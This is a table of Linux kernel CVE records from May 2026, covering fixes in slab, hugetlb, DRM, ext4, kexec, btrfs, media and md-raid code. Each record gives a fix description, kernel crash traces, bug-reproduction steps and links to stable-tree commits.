| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/slab: do not access current->mems_allowed_seq if !allow_spin Lockdep complains when get_from_any_partial() is called in an NMI context, because current->mems_allowed_seq is seqcount_spinlock_t and not NMI-safe: ================================ WARNING: inconsistent lock state 6.19.0-rc5-kfree-rcu+ #315 Tainted: G N -------------------------------- inconsistent {INITIAL USE} -> {IN-NMI} usage. kunit_try_catch/9989 [HC1[1]:SC0[0]:HE0:SE1] takes: ffff889085799820 (&____s->seqcount#3){.-.-}-{0:0}, at: ___slab_alloc+0x58f/0xc00 {INITIAL USE} state was registered at: lock_acquire+0x185/0x320 kernel_init_freeable+0x391/0x1150 kernel_init+0x1f/0x220 ret_from_fork+0x736/0x8f0 ret_from_fork_asm+0x1a/0x30 irq event stamp: 56 hardirqs last enabled at (55): [<ffffffff850a68d7>] _raw_spin_unlock_irq+0x27/0x70 hardirqs last disabled at (56): [<ffffffff850858ca>] __schedule+0x2a8a/0x6630 softirqs last enabled at (0): [<ffffffff81536711>] copy_process+0x1dc1/0x6a10 softirqs last disabled at (0): [<0000000000000000>] 0x0 other info that might help us debug this: Possible unsafe locking scenario: CPU0 ---- lock(&____s->seqcount#3); <Interrupt> lock(&____s->seqcount#3); *** DEADLOCK *** According to Documentation/locking/seqlock.rst, seqcount_t is not NMI-safe and seqcount_latch_t should be used when read path can interrupt the write-side critical section. In this case, do not access current->mems_allowed_seq and avoid retry. | 2026-05-08 | not yet calculated | CVE-2026-43285 | https://git.kernel.org/stable/c/353dd9934447b9193643ae1afd938607a74d4915 https://git.kernel.org/stable/c/efd767ddcef0669bbd33c6a823ea0a88f06d4b29 https://git.kernel.org/stable/c/144080a5823b2dbd635acb6decf7ab23182664f3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/hugetlb: restore failed global reservations to subpool Commit a833a693a490 ("mm: hugetlb: fix incorrect fallback for subpool") fixed an underflow error for hstate->resv_huge_pages caused by incorrectly attributing globally requested pages to the subpool's reservation. Unfortunately, this fix also introduced the opposite problem, which would leave spool->used_hpages elevated if the globally requested pages could not be acquired. This is because while a subpool's reserve pages only accounts for what is requested and allocated from the subpool, its "used" counter keeps track of what is consumed in total, both from the subpool and globally. Thus, we need to adjust spool->used_hpages in the other direction, and make sure that globally requested pages are uncharged from the subpool's used counter. Each failed allocation attempt increments the used_hpages counter by how many pages were requested from the global pool. Ultimately, this renders the subpool unusable, as used_hpages approaches the max limit. The issue can be reproduced as follows: 1. Allocate 4 hugetlb pages 2. Create a hugetlb mount with max=4, min=2 3. Consume 2 pages globally 4. Request 3 pages from the subpool (2 from subpool + 1 from global) 4.1 hugepage_subpool_get_pages(spool, 3) succeeds. used_hpages += 3 4.2 hugetlb_acct_memory(h, 1) fails: no global pages left used_hpages -= 2 5. Subpool now has used_hpages = 1, despite not being able to successfully allocate any hugepages. It believes it can now only allocate 3 more hugepages, not 4. With each failed allocation attempt incrementing the used counter, the subpool eventually reaches a point where its used counter equals its max counter. At that point, any future allocations that try to allocate hugeTLB pages from the subpool will fail, despite the subpool not having any of its hugeTLB pages consumed by any user. Once this happens, there is no way to make the subpool usable again, since there is no way to decrement the used counter as no process is really consuming the hugeTLB pages. The underflow issue that the original commit fixes still remains fixed as well. Without this fix, used_hpages would keep on leaking if hugetlb_acct_memory() fails. | 2026-05-08 | not yet calculated | CVE-2026-43286 | https://git.kernel.org/stable/c/5eac1322a7b14b8cd05ec896618278b90fba7f39 https://git.kernel.org/stable/c/f055897c975d079a90af873c791ab58cf0f6f2a5 https://git.kernel.org/stable/c/1d3f9bb4c8af70304d19c22e30f5d16a2d589bb5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm: Account property blob allocations to memcg DRM_IOCTL_MODE_CREATEPROPBLOB allows userspace to allocate arbitrary-sized property blobs backed by kernel memory. Currently, the blob data allocation is not accounted to the allocating process's memory cgroup, allowing unprivileged users to trigger unbounded kernel memory consumption and potentially cause system-wide OOM. Mark the property blob data allocation with GFP_KERNEL_ACCOUNT so that the memory is properly charged to the caller's memcg. This ensures existing cgroup memory limits apply and prevents uncontrolled kernel memory growth without introducing additional policy or per-file limits. | 2026-05-08 | not yet calculated | CVE-2026-43287 | https://git.kernel.org/stable/c/b6117210ed349356f8e6027ff020b4d620bca42b https://git.kernel.org/stable/c/815fa29cab3c67bebb9d0b5f41145cdd3a14d04d https://git.kernel.org/stable/c/866e0c1a9e7244d58ed74853cb22b81e1900cfdd https://git.kernel.org/stable/c/bbfaa5761f589a81031b493cb01275a990d6fb25 https://git.kernel.org/stable/c/8e1664b9ee43608eb973d357ae5d858d30cbc9ca https://git.kernel.org/stable/c/cb8b9a1755fe9f38e4fb7f287486d7e7fab3dba4 https://git.kernel.org/stable/c/405fd652d8fedff219a8f48daf8f20e881e303ab https://git.kernel.org/stable/c/26b4309a3ab82a0697751cde52eb336c29c19035 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: move ext4_percpu_param_init() before ext4_mb_init() When running `kvm-xfstests -c ext4/1k -C 1 generic/383` with the `DOUBLE_CHECK` macro defined, the following panic is triggered: ================================================================== EXT4-fs error (device vdc): ext4_validate_block_bitmap:423: comm mount: bg 0: bad block bitmap checksum BUG: unable to handle page fault for address: ff110000fa2cc000 PGD 3e01067 P4D 3e02067 PUD 0 Oops: Oops: 0000 [#1] SMP NOPTI CPU: 0 UID: 0 PID: 2386 Comm: mount Tainted: G W 6.18.0-gba65a4e7120a-dirty #1152 PREEMPT(none) RIP: 0010:percpu_counter_add_batch+0x13/0xa0 Call Trace: <TASK> ext4_mark_group_bitmap_corrupted+0xcb/0xe0 ext4_validate_block_bitmap+0x2a1/0x2f0 ext4_read_block_bitmap+0x33/0x50 mb_group_bb_bitmap_alloc+0x33/0x80 ext4_mb_add_groupinfo+0x190/0x250 ext4_mb_init_backend+0x87/0x290 ext4_mb_init+0x456/0x640 __ext4_fill_super+0x1072/0x1680 ext4_fill_super+0xd3/0x280 get_tree_bdev_flags+0x132/0x1d0 vfs_get_tree+0x29/0xd0 vfs_cmd_create+0x59/0xe0 __do_sys_fsconfig+0x4f6/0x6b0 do_syscall_64+0x50/0x1f0 entry_SYSCALL_64_after_hwframe+0x76/0x7e ================================================================== This issue can be reproduced using the following commands: mkfs.ext4 -F -q -b 1024 /dev/sda 5G tune2fs -O quota,project /dev/sda mount /dev/sda /tmp/test With DOUBLE_CHECK defined, mb_group_bb_bitmap_alloc() reads and validates the block bitmap. When the validation fails, ext4_mark_group_bitmap_corrupted() attempts to update sbi->s_freeclusters_counter. However, this percpu_counter has not been initialized yet at this point, which leads to the panic described above. Fix this by moving the execution of ext4_percpu_param_init() to occur before ext4_mb_init(), ensuring the per-CPU counters are initialized before they are used. | 2026-05-08 | not yet calculated | CVE-2026-43288 | https://git.kernel.org/stable/c/0d5fcb063cdabb9aeaa8554b7fedad2092c4150e https://git.kernel.org/stable/c/9e9fb259bcddf459a0168f4a964e979e500a68a5 https://git.kernel.org/stable/c/bf5b609524497c195f801cd5707252384aed8149 https://git.kernel.org/stable/c/aec095f3cc6cf209effd93278ce35be27db81d73 https://git.kernel.org/stable/c/270564513489d98b721a1e4a10017978d5213bff |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: kexec: derive purgatory entry from symbol kexec_load_purgatory() derives image->start by locating e_entry inside an SHF_EXECINSTR section. If the purgatory object contains multiple executable sections with overlapping sh_addr, the entrypoint check can match more than once and trigger a WARN. Derive the entry section from the purgatory_start symbol when present and compute image->start from its final placement. Keep the existing e_entry fallback for purgatories that do not expose the symbol. WARNING: kernel/kexec_file.c:1009 at kexec_load_purgatory+0x395/0x3c0, CPU#10: kexec/1784 Call Trace: <TASK> bzImage64_load+0x133/0xa00 __do_sys_kexec_file_load+0x2b3/0x5c0 do_syscall_64+0x81/0x610 entry_SYSCALL_64_after_hwframe+0x76/0x7e [me@linux.beauty: move helper to avoid forward declaration, per Baoquan] | 2026-05-08 | not yet calculated | CVE-2026-43289 | https://git.kernel.org/stable/c/027797595a108726f4a0a45d225f603b0ffbd22b https://git.kernel.org/stable/c/1737d37ae1d2814e6cf0a1af87af3d41f0812b95 https://git.kernel.org/stable/c/f736032c638a33a243e9126e617788f763d648f9 https://git.kernel.org/stable/c/cfccd3b8c51bc57a8a6fcb2fd30453afae5bc0d2 https://git.kernel.org/stable/c/875355152b33436907c2a6d2ffad1431fa86c62b https://git.kernel.org/stable/c/36eb314184a0ae74dd42914b47d2b9fc43be8034 https://git.kernel.org/stable/c/5226570bd252cea2e805a161cb0f75c204c3108a https://git.kernel.org/stable/c/480e1d5c64bb14441f79f2eb9421d5e26f91ea3d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/vmalloc: prevent RCU stalls in kasan_release_vmalloc_node When CONFIG_PAGE_OWNER is enabled, freeing KASAN shadow pages during vmalloc cleanup triggers expensive stack unwinding that acquires RCU read locks. Processing a large purge_list without rescheduling can cause the task to hold CPU for extended periods (10+ seconds), leading to RCU stalls and potential OOM conditions. The issue manifests in purge_vmap_node() -> kasan_release_vmalloc_node() where iterating through hundreds or thousands of vmap_area entries and freeing their associated shadow pages causes: rcu: INFO: rcu_preempt detected stalls on CPUs/tasks: rcu: Tasks blocked on level-0 rcu_node (CPUs 0-1): P6229/1:b..l ... task:kworker/0:17 state:R running task stack:28840 pid:6229 ... kasan_release_vmalloc_node+0x1ba/0xad0 mm/vmalloc.c:2299 purge_vmap_node+0x1ba/0xad0 mm/vmalloc.c:2299 Each call to kasan_release_vmalloc() can free many pages, and with page_owner tracking, each free triggers save_stack() which performs stack unwinding under RCU read lock. Without yielding, this creates an unbounded RCU critical section. Add periodic cond_resched() calls within the loop to allow: - RCU grace periods to complete - Other tasks to run - Scheduler to preempt when needed The fix uses need_resched() for immediate response under load, with a batch count of 32 as a guaranteed upper bound to prevent worst-case stalls even under light load. | 2026-05-08 | not yet calculated | CVE-2026-43292 | https://git.kernel.org/stable/c/2efa9c02c9b4c0d6866aa445f11056809b25ca28 https://git.kernel.org/stable/c/1afe45f89d54b7183768ebbbbf14238ec187ab5c https://git.kernel.org/stable/c/b351fbe71091f7c8676c8ba597653d08b6719447 https://git.kernel.org/stable/c/5747435e0fd474c24530ef1a6822f47e7d264b27 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: chips-media: wave5: Fix kthread worker destruction in polling mode Fix the cleanup order in polling mode (irq < 0) to prevent kernel warnings during module removal. Cancel the hrtimer before destroying the kthread worker to ensure work queues are empty. In polling mode, the driver uses hrtimer to periodically trigger wave5_vpu_timer_callback() which queues work via kthread_queue_work(). The kthread_destroy_worker() function validates that both work queues are empty with WARN_ON(!list_empty(&worker->work_list)) and WARN_ON(!list_empty(&worker->delayed_work_list)). The original code called kthread_destroy_worker() before hrtimer_cancel(), creating a race condition where the timer could fire during worker destruction and queue new work, triggering the WARN_ON. This causes the following warning on every module unload in polling mode: ------------[ cut here ]------------ WARNING: CPU: 2 PID: 1034 at kernel/kthread.c:1430 kthread_destroy_worker+0x84/0x98 Modules linked in: wave5(-) rpmsg_ctrl rpmsg_char ... Call trace: kthread_destroy_worker+0x84/0x98 wave5_vpu_remove+0xc8/0xe0 [wave5] platform_remove+0x30/0x58 ... ---[ end trace 0000000000000000 ]--- | 2026-05-08 | not yet calculated | CVE-2026-43293 | https://git.kernel.org/stable/c/156020e889edf4593870d926d3c4a6d06baac44a https://git.kernel.org/stable/c/cc8071b1bac6568ea09d54be2d4f74dba80e17f8 https://git.kernel.org/stable/c/0c2e752688a0ee3b89993e6de6c496d863870c93 https://git.kernel.org/stable/c/5a0c122e834b2f7f029526422c71be922960bf03 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm: renesas: rz-du: mipi_dsi: fix kernel panic when rebooting for some panels Since commit 56de5e305d4b ("clk: renesas: r9a07g044: Add MSTOP for RZ/G2L") we may get the following kernel panic, for some panels, when rebooting: systemd-shutdown[1]: Rebooting. Call trace: ... do_serror+0x28/0x68 el1h_64_error_handler+0x34/0x50 el1h_64_error+0x6c/0x70 rzg2l_mipi_dsi_host_transfer+0x114/0x458 (P) mipi_dsi_device_transfer+0x44/0x58 mipi_dsi_dcs_set_display_off_multi+0x9c/0xc4 ili9881c_unprepare+0x38/0x88 drm_panel_unprepare+0xbc/0x108 This happens for panels that need to send MIPI-DSI commands in their unprepare() callback. Since the MIPI-DSI interface is stopped at that point, rzg2l_mipi_dsi_host_transfer() triggers the kernel panic. Fix by moving rzg2l_mipi_dsi_stop() to new callback function rzg2l_mipi_dsi_atomic_post_disable(). With this change we now have the correct power-down/stop sequence: systemd-shutdown[1]: Rebooting. rzg2l-mipi-dsi 10850000.dsi: rzg2l_mipi_dsi_atomic_disable(): entry ili9881c-dsi 10850000.dsi.0: ili9881c_unprepare(): entry rzg2l-mipi-dsi 10850000.dsi: rzg2l_mipi_dsi_atomic_post_disable(): entry reboot: Restarting system | 2026-05-08 | not yet calculated | CVE-2026-43294 | https://git.kernel.org/stable/c/79f42487ed60d0d5ffce97c3bb98f80c3d17735a https://git.kernel.org/stable/c/41cda667ffc5074c56279c632b0c20024da6ecdd https://git.kernel.org/stable/c/64aa8b3a60a825134f7d866adf05c024bbe0c24c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rapidio: replace rio_free_net() with kfree() in rio_scan_alloc_net() When idtab allocation fails, net is not registered with rio_add_net() yet, so kfree(net) is sufficient to release the memory. Set mport->net to NULL to avoid dangling pointer. | 2026-05-08 | not yet calculated | CVE-2026-43295 | https://git.kernel.org/stable/c/83e579c2f7f6b1706323d744833b26470049dcc2 https://git.kernel.org/stable/c/34a4f233df5eef5f1f113b2196142c0568b387f8 https://git.kernel.org/stable/c/fecf292c6691970897396190855aa38826b7104e https://git.kernel.org/stable/c/649c2e853608cad0b0cba545555d168e67f094b3 https://git.kernel.org/stable/c/87272e3e70ec4b666885bd520ff77463c11444ef https://git.kernel.org/stable/c/e5a732bfe29451e16abf9c6f07ce5948b22f3d59 https://git.kernel.org/stable/c/78812c4fb7ed242d5961bf1337a49070d6487c94 https://git.kernel.org/stable/c/666183dcdd9ad3b8156a1df7f204f728f720380f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: rockchip: rga: Fix possible ERR_PTR dereference in rga_buf_init() rga_get_frame() can return ERR_PTR(-EINVAL) when buffer type is unsupported or invalid. rga_buf_init() does not check the return value and unconditionally dereferences the pointer when accessing f->size. Add proper ERR_PTR checking and return the error to prevent dereferencing an invalid pointer. | 2026-05-08 | not yet calculated | CVE-2026-43297 | https://git.kernel.org/stable/c/5da29ade540b51763b950987bd410add7edaf3d1 https://git.kernel.org/stable/c/1af2853b4e97fd95262fdef311b2334337069bc9 https://git.kernel.org/stable/c/aa22221c5dc695a3d479e1e1b63f0c0e9eb29dbf https://git.kernel.org/stable/c/81f8e0e6a2e115df9274d0289779f8fca694479c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: Skip vcn poison irq release on VF VF doesn't enable VCN poison irq in VCNv2.5. Skip releasing it and avoid call trace during deinitialization. [ 71.913601] [drm] clean up the vf2pf work item [ 71.915088] ------------[ cut here ]------------ [ 71.915092] WARNING: CPU: 3 PID: 1079 at /tmp/amd.aFkFvSQl/amd/amdgpu/amdgpu_irq.c:641 amdgpu_irq_put+0xc6/0xe0 [amdgpu] [ 71.915355] Modules linked in: amdgpu(OE-) amddrm_ttm_helper(OE) amdttm(OE) amddrm_buddy(OE) amdxcp(OE) amddrm_exec(OE) amd_sched(OE) amdkcl(OE) drm_suballoc_helper drm_display_helper cec rc_core i2c_algo_bit video wmi binfmt_misc nls_iso8859_1 intel_rapl_msr intel_rapl_common input_leds joydev serio_raw mac_hid qemu_fw_cfg sch_fq_codel dm_multipath scsi_dh_rdac scsi_dh_emc scsi_dh_alua efi_pstore ip_tables x_tables autofs4 btrfs blake2b_generic raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx xor raid6_pq libcrc32c raid1 raid0 hid_generic crct10dif_pclmul crc32_pclmul polyval_clmulni polyval_generic ghash_clmulni_intel usbhid 8139too sha256_ssse3 sha1_ssse3 hid psmouse bochs i2c_i801 ahci drm_vram_helper libahci i2c_smbus lpc_ich drm_ttm_helper 8139cp mii ttm aesni_intel crypto_simd cryptd [ 71.915484] CPU: 3 PID: 1079 Comm: rmmod Tainted: G OE 6.8.0-87-generic #88~22.04.1-Ubuntu [ 71.915489] Hardware name: Red Hat KVM/RHEL, BIOS 1.16.3-2.el9_5.1 04/01/2014 [ 71.915492] RIP: 0010:amdgpu_irq_put+0xc6/0xe0 [amdgpu] [ 71.915768] Code: 75 84 b8 ea ff ff ff eb d4 44 89 ea 48 89 de 4c 89 e7 e8 fd fc ff ff 5b 41 5c 41 5d 41 5e 5d 31 d2 31 f6 31 ff e9 55 30 3b c7 <0f> 0b eb d4 b8 fe ff ff ff eb a8 e9 b7 3b 8a 00 66 2e 0f 1f 84 00 [ 71.915771] RSP: 0018:ffffcf0800eafa30 EFLAGS: 00010246 [ 71.915775] RAX: 0000000000000000 RBX: ffff891bda4b0668 RCX: 0000000000000000 [ 71.915777] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000 [ 71.915779] RBP: ffffcf0800eafa50 R08: 0000000000000000 R09: 0000000000000000 [ 71.915781] R10: 0000000000000000 R11: 0000000000000000 R12: ffff891bda480000 [ 71.915782] R13: 0000000000000000 R14: 0000000000000001 R15: 0000000000000000 [ 71.915792] FS: 000070cff87c4c40(0000) GS:ffff893abfb80000(0000) knlGS:0000000000000000 [ 71.915795] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 71.915797] CR2: 00005fa13073e478 CR3: 000000010d634006 CR4: 0000000000770ef0 [ 71.915800] PKRU: 55555554 [ 71.915802] Call Trace: [ 71.915805] <TASK> [ 71.915809] vcn_v2_5_hw_fini+0x19e/0x1e0 [amdgpu] | 2026-05-08 | not yet calculated | CVE-2026-43298 | https://git.kernel.org/stable/c/8ee9aa80d4f1893a6699d46c403a1731548b544b https://git.kernel.org/stable/c/f1db6fc5a834c8ca9485cc0596dd7df8b8619b64 https://git.kernel.org/stable/c/8980be03b3f9a4b58197ef95d3b37efa41a25331 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: do not ASSERT() when the fs flips RO inside btrfs_repair_io_failure() [BUG] There is a bug report that when btrfs hits ENOSPC error in a critical path, btrfs flips RO (this part is expected, although the ENOSPC bug still needs to be addressed). The problem is after the RO flip, if there is a read repair pending, we can hit the ASSERT() inside btrfs_repair_io_failure() like the following: BTRFS info (device vdc): relocating block group 30408704 flags metadata|raid1 ------------[ cut here ]------------ BTRFS: Transaction aborted (error -28) WARNING: fs/btrfs/extent-tree.c:3235 at __btrfs_free_extent.isra.0+0x453/0xfd0, CPU#1: btrfs/383844 Modules linked in: kvm_intel kvm irqbypass [...] ---[ end trace 0000000000000000 ]--- BTRFS info (device vdc state EA): 2 enospc errors during balance BTRFS info (device vdc state EA): balance: ended with status: -30 BTRFS error (device vdc state EA): parent transid verify failed on logical 30556160 mirror 2 wanted 8 found 6 BTRFS error (device vdc state EA): bdev /dev/nvme0n1 errs: wr 0, rd 0, flush 0, corrupt 10, gen 0 [...] assertion failed: !(fs_info->sb->s_flags & SB_RDONLY) :: 0, in fs/btrfs/bio.c:938 ------------[ cut here ]------------ assertion failed: !(fs_info->sb->s_flags & SB_RDONLY) :: 0, in fs/btrfs/bio.c:938 kernel BUG at fs/btrfs/bio.c:938! Oops: invalid opcode: 0000 [#1] SMP NOPTI CPU: 0 UID: 0 PID: 868 Comm: kworker/u8:13 Tainted: G W N 6.19.0-rc6+ #4788 PREEMPT(full) Tainted: [W]=WARN, [N]=TEST Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.17.0-0-gb52ca86e094d-prebuilt.qemu.org 04/01/2014 Workqueue: btrfs-endio simple_end_io_work RIP: 0010:btrfs_repair_io_failure.cold+0xb2/0x120 RSP: 0000:ffffc90001d2bcf0 EFLAGS: 00010246 RAX: 0000000000000051 RBX: 0000000000001000 RCX: 0000000000000000 RDX: 0000000000000000 RSI: ffffffff8305cf42 RDI: 00000000ffffffff RBP: 0000000000000002 R08: 00000000fffeffff R09: ffffffff837fa988 R10: ffffffff8327a9e0 R11: 6f69747265737361 R12: ffff88813018d310 R13: ffff888168b8a000 R14: ffffc90001d2bd90 R15: ffff88810a169000 FS: 0000000000000000(0000) GS:ffff8885e752c000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 ------------[ cut here ]------------ [CAUSE] The cause of -ENOSPC error during the test case btrfs/124 is still unknown, although it's known that we still have cases where metadata can be over-committed but can not be fulfilled correctly, thus if we hit such ENOSPC error inside a critical path, we have no choice but abort the current transaction. This will mark the fs read-only. The problem is inside the btrfs_repair_io_failure() path that we require the fs not to be mount read-only. This is normally fine, but if we are doing a read-repair meanwhile the fs flips RO due to a critical error, we can enter btrfs_repair_io_failure() with super block set to read-only, thus triggering the above crash. [FIX] Just replace the ASSERT() with a proper return if the fs is already read-only. | 2026-05-08 | not yet calculated | CVE-2026-43299 | https://git.kernel.org/stable/c/f6df18c001e3dcebc08482d0adeacd0cfea08593 https://git.kernel.org/stable/c/8ceaad6cd6e7fa5f73b0b2796a2e85d75d37e9f3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/panel: Fix a possible null-pointer dereference in jdi_panel_dsi_remove() In jdi_panel_dsi_remove(), jdi is explicitly checked, indicating that it may be NULL: if (!jdi) mipi_dsi_detach(dsi); However, when jdi is NULL, the function does not return and continues by calling jdi_panel_disable(): err = jdi_panel_disable(&jdi->base); Inside jdi_panel_disable(), jdi is dereferenced unconditionally, which can lead to a NULL-pointer dereference: struct jdi_panel *jdi = to_panel_jdi(panel); backlight_disable(jdi->backlight); To prevent such a potential NULL-pointer dereference, return early from jdi_panel_dsi_remove() when jdi is NULL. | 2026-05-08 | not yet calculated | CVE-2026-43300 | https://git.kernel.org/stable/c/ec2f37bbb733cdd7ed7d04171fca728a532414d5 https://git.kernel.org/stable/c/2f5427d8726b22b807beec248d7d6bf88e291e0b https://git.kernel.org/stable/c/83ce0085fabf757b039322928188ad78e962d609 https://git.kernel.org/stable/c/95eed73b871111123a8b1d31cb1fce7e902e49ea |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: chips-media: wave5: Fix PM runtime usage count underflow Replace pm_runtime_put_sync() with pm_runtime_dont_use_autosuspend() in the remove path to properly pair with pm_runtime_use_autosuspend() from probe. This allows pm_runtime_disable() to handle reference count cleanup correctly regardless of current suspend state. The driver calls pm_runtime_put_sync() unconditionally in remove, but the device may already be suspended due to autosuspend configured in probe. When autosuspend has already suspended the device, the usage count is 0, and pm_runtime_put_sync() decrements it to -1. This causes the following warning on module unload: ------------[ cut here ]------------ WARNING: CPU: 1 PID: 963 at kernel/kthread.c:1430 kthread_destroy_worker+0x84/0x98 ... vdec 30210000.video-codec: Runtime PM usage count underflow! | 2026-05-08 | not yet calculated | CVE-2026-43301 | https://git.kernel.org/stable/c/3a278a55ead50db2444c8f01410c7f5a68723990 https://git.kernel.org/stable/c/0bffda02317989f8d5cdc2d4462a4110b1290cf0 https://git.kernel.org/stable/c/9cf4452e824c1e2d41c9c0b13cc8a32a0a7dec38 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/v3d: Set DMA segment size to avoid debug warnings When using V3D rendering with CONFIG_DMA_API_DEBUG enabled, the kernel occasionally reports a segment size mismatch. This is because 'max_seg_size' is not set. The kernel defaults to 64K. setting 'max_seg_size' to the maximum will prevent 'debug_dma_map_sg()' from complaining about the over-mapping of the V3D segment length. DMA-API: v3d 1002000000.v3d: mapping sg segment longer than device claims to support [len=8290304] [max=65536] WARNING: CPU: 0 PID: 493 at kernel/dma/debug.c:1179 debug_dma_map_sg+0x330/0x388 CPU: 0 UID: 0 PID: 493 Comm: Xorg Not tainted 6.12.53-yocto-standard #1 Hardware name: Raspberry Pi 5 Model B Rev 1.0 (DT) pstate: 60400009 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : debug_dma_map_sg+0x330/0x388 lr : debug_dma_map_sg+0x330/0x388 sp : ffff8000829a3ac0 x29: ffff8000829a3ac0 x28: 0000000000000001 x27: ffff8000813fe000 x26: ffffc1ffc0000000 x25: ffff00010fdeb760 x24: 0000000000000000 x23: ffff8000816a9bf0 x22: 0000000000000001 x21: 0000000000000002 x20: 0000000000000002 x19: ffff00010185e810 x18: ffffffffffffffff x17: 69766564206e6168 x16: 74207265676e6f6c x15: 20746e656d676573 x14: 20677320676e6970 x13: 5d34303334393134 x12: 0000000000000000 x11: 00000000000000c0 x10: 00000000000009c0 x9 : ffff8000800e0b7c x8 : ffff00010a315ca0 x7 : ffff8000816a5110 x6 : 0000000000000001 x5 : 000000000000002b x4 : 0000000000000002 x3 : 0000000000000008 x2 : 0000000000000000 x1 : 0000000000000000 x0 : ffff00010a315280 Call trace: debug_dma_map_sg+0x330/0x388 __dma_map_sg_attrs+0xc0/0x278 dma_map_sgtable+0x30/0x58 drm_gem_shmem_get_pages_sgt+0xb4/0x140 v3d_bo_create_finish+0x28/0x130 [v3d] v3d_create_bo_ioctl+0x54/0x180 [v3d] drm_ioctl_kernel+0xc8/0x140 drm_ioctl+0x2d4/0x4d8 | 2026-05-08 | not yet calculated | CVE-2026-43302 | https://git.kernel.org/stable/c/14d0d6c8b4504a60cfeea74775ab2e0164019e65 https://git.kernel.org/stable/c/225023e3619b81af6d8d0e680503fc2d68633023 https://git.kernel.org/stable/c/2663ef70c6123b2232190f917275e5c3175f97d0 https://git.kernel.org/stable/c/cf510785f74e74c54de40a43a955b7f844857487 https://git.kernel.org/stable/c/0290934d30abe7c88e18140fd5184c3f386b1e44 https://git.kernel.org/stable/c/db15f469a88d3bbeeaa9f8c9f5e74d856ba5d7d2 https://git.kernel.org/stable/c/9eb018828b1b30dfba689c060735c50fc5b9f704 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Fix mismatched unlock for DMUB HW lock in HWSS fast path [Why] The evaluation for whether we need to use the DMUB HW lock isn't the same as whether we need to unlock which results in a hang when the fast path is used for ASIC without FAMS support. [How] Store a flag that indicates whether we should use the lock and use that same flag to specify whether unlocking is needed. | 2026-05-08 | not yet calculated | CVE-2026-43305 | https://git.kernel.org/stable/c/4e387ad67efb100b645630ffbce7716786f52283 https://git.kernel.org/stable/c/af3303970da5ce5bfe6dffdd07f38f42aad603e0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: crypto: Use the correct destructor kfunc type With CONFIG_CFI enabled, the kernel strictly enforces that indirect function calls use a function pointer type that matches the target function. I ran into the following type mismatch when running BPF self-tests: CFI failure at bpf_obj_free_fields+0x190/0x238 (target: bpf_crypto_ctx_release+0x0/0x94; expected type: 0xa488ebfc) Internal error: Oops - CFI: 00000000f2008228 [#1] SMP ... As bpf_crypto_ctx_release() is also used in BPF programs and using a void pointer as the argument would make the verifier unhappy, add a simple stub function with the correct type and register it as the destructor kfunc instead. | 2026-05-08 | not yet calculated | CVE-2026-43306 | https://git.kernel.org/stable/c/4e3e57dbf46dad3498f8c4219ce2dba756875962 https://git.kernel.org/stable/c/50d6fd69388cc7b05dce72f09080674dcede4ac9 https://git.kernel.org/stable/c/3979a550fe06b370d73647f59cf462fa525c9ec4 https://git.kernel.org/stable/c/b40a5d724f29fc2eed23ff353808a9aae616b48a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: don't BUG() on unexpected delayed ref type in run_one_delayed_ref() There is no need to BUG(), we can just return an error and log an error message. | 2026-05-08 | not yet calculated | CVE-2026-43308 | https://git.kernel.org/stable/c/5549743e11c06da23cfa7712a994b9f1e69064c6 https://git.kernel.org/stable/c/c7d1d4ff56744074e005771aff193b927392d51f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: md raid: fix hang when stopping arrays with metadata through dm-raid When using device-mapper's dm-raid target, stopping a RAID array can cause the system to hang under specific conditions. This occurs when: - A dm-raid managed device tree is suspended from top to bottom (the top-level RAID device is suspended first, followed by its underlying metadata and data devices) - The top-level RAID device is then removed Removing the top-level device triggers a hang in the following sequence: the dm-raid destructor calls md_stop(), which tries to flush the write-intent bitmap by writing to the metadata sub-devices. However, these devices are already suspended, making them unable to complete the write-intent operations and causing an indefinite block. Fix: - Prevent bitmap flushing when md_stop() is called from dm-raid destructor context and avoid a quiescing/unquiescing cycle which could also cause I/O - Still allow write-intent bitmap flushing when called from dm-raid suspend context This ensures that RAID array teardown can complete successfully even when the underlying devices are in a suspended state. This second patch uses md_is_rdwr() to distinguish between suspend and destructor paths as elaborated on above. | 2026-05-08 | not yet calculated | CVE-2026-43309 | https://git.kernel.org/stable/c/24783dd06de870d646c25207bae186f78195f912 https://git.kernel.org/stable/c/338378dfffbdbb8d37a18f0a0c0358812671f91e https://git.kernel.org/stable/c/cefcb9297fbdb6d94b61787b4f8d84f55b741470 |
